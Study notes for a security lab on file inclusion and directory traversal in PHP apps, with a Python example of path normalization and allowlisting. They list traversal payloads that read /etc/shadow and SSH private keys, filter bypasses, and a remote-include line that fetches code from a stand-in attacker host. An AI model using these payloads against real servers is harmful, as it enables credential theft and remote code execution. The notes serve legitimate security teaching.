File inclusion vulnerabilities happen when a web app uses user-controlled input to build file paths (or URLs) that get loaded by the server. This can lead to information disclosure (source code, credentials) and sometimes RCE (via log poisoning, file upload + include, wrappers, or RFI).
Core root cause: missing input validation + trusting user-supplied path/filename.
Directory traversal lets you read files outside the intended directory by using ../ sequences ("dot-dot-slash").
Example entry point: get.php?file=
- Linux: ../../../../etc/passwd
- Windows: ../../../../windows/win.ini
Full request: http://webapp.thm/get.php?file=../../../../etc/passwd
Commonly targeted files:
- Linux: /etc/passwd, /etc/shadow, /etc/issue, /proc/version, /root/.ssh/id_rsa, /home/<user>/.ssh/id_rsa, /var/log/apache2/access.log
- Windows: C:\boot.ini, C:\windows\win.ini

LFI often appears in PHP apps using include/require with a parameter like lang or page.
// vulnerable idea: the parameter goes straight into include(), so any path (absolute or relative) is loaded
<?php include($_GET["lang"]); ?>
# exploit
/index.php?lang=/etc/passwd

// vulnerable idea: a fixed prefix directory, but the input is never normalized or validated
<?php include("languages/" . $_GET["lang"]); ?>
# exploit
/index.php?lang=../../../../etc/passwd
Exam note: even with a fixed prefix directory, traversal still works if input is not normalized/validated.
Error messages often reveal:
- the prefix or suffix the app adds (e.g. languages/ or .php)
- how many ../ you need
Example hint: include(languages/THM.php) tells you ".php is appended".

Bypass notes:
- Appended extension (.php): the older trick is the null byte %00 (mostly fixed in modern PHP).
- Filtered traversal (../): try bypass patterns like ....// repeated.
- /etc/passwd/. style current-dir tricks bypass naive filters.
Reality check: many "classic" bypasses depend on versions and exact code. Use them as hypotheses, not guaranteed wins.
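The exam note above (a fixed prefix is no defense without normalization) and the ....// defeat of naive "../" stripping, shown side by side in an added Python example that is not part of these notes. It models the PHP include() path logic with string operations only; BASE_DIR, the allowed language names and the naive filter are constructed assumptions.

```python
import posixpath

# Constructed example base directory standing in for the app's "languages/" prefix.
BASE_DIR = "/var/www/languages"


def vulnerable_path(user_value: str) -> str:
    """Mirrors include("languages/" . $_GET["lang"]): fixed prefix, no validation.
    The ../ sequences are kept as-is and the filesystem resolves them later."""
    return BASE_DIR + "/" + user_value


def naive_strip_filter(user_value: str) -> str:
    """A filter that removes "../" in one pass. "....//" defeats it: deleting the
    inner "../" from each "....//" leaves a fresh "../" behind."""
    return user_value.replace("../", "")


def safe_lang_path(user_value: str):
    """Normalize first, then check the result is still under BASE_DIR.
    Returns the resolved path, or None to reject the request."""
    if "\x00" in user_value:                              # null byte truncation trick
        return None
    if user_value.startswith("/") or "\\" in user_value:  # absolute path or Windows separator
        return None
    # Force the extension ourselves instead of letting the user pick the file type.
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, user_value + ".php"))
    # After normpath every ".." has been resolved, so a traversal that escapes the
    # prefix shows up as a path that no longer starts with BASE_DIR + "/".
    if not candidate.startswith(BASE_DIR + "/"):
        return None
    return candidate


def allowlisted_lang_path(user_value: str, allowed=("en", "fr", "de")):
    """Strongest option: the parameter selects from a fixed set and never names a path."""
    if user_value not in allowed:
        return None
    return f"{BASE_DIR}/{user_value}.php"


if __name__ == "__main__":
    for probe in ("en", "../../../../etc/passwd", "....//....//etc/passwd", "/etc/passwd"):
        stripped = naive_strip_filter(probe)
        print(f"{probe!r}")
        print(f"  naive filter + prefix -> {vulnerable_path(stripped)!r}")
        print(f"  normalized check      -> {safe_lang_path(probe)!r}")
```

The "....//" probe stays inside BASE_DIR under the normalized check only because "...." is treated as a literal directory name, which is exactly what the stripping filter fails to do.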
RFI is when the include function accepts a remote URL. It typically requires PHP settings like allow_url_fopen (and often allow_url_include) to be enabled.
Risk: RFI can become RCE because you execute attacker-controlled remote content in the server context.
# example concept
/index.php?lang=http://attacker.thm/cmd.txt
Quick methodology:
- Find entry points: ?file=, ?page=, ?lang=, cookies, headers.
- Probe with known files: /etc/passwd, /proc/version, win.ini.
- Try traversal (../), then try filter bypass patterns.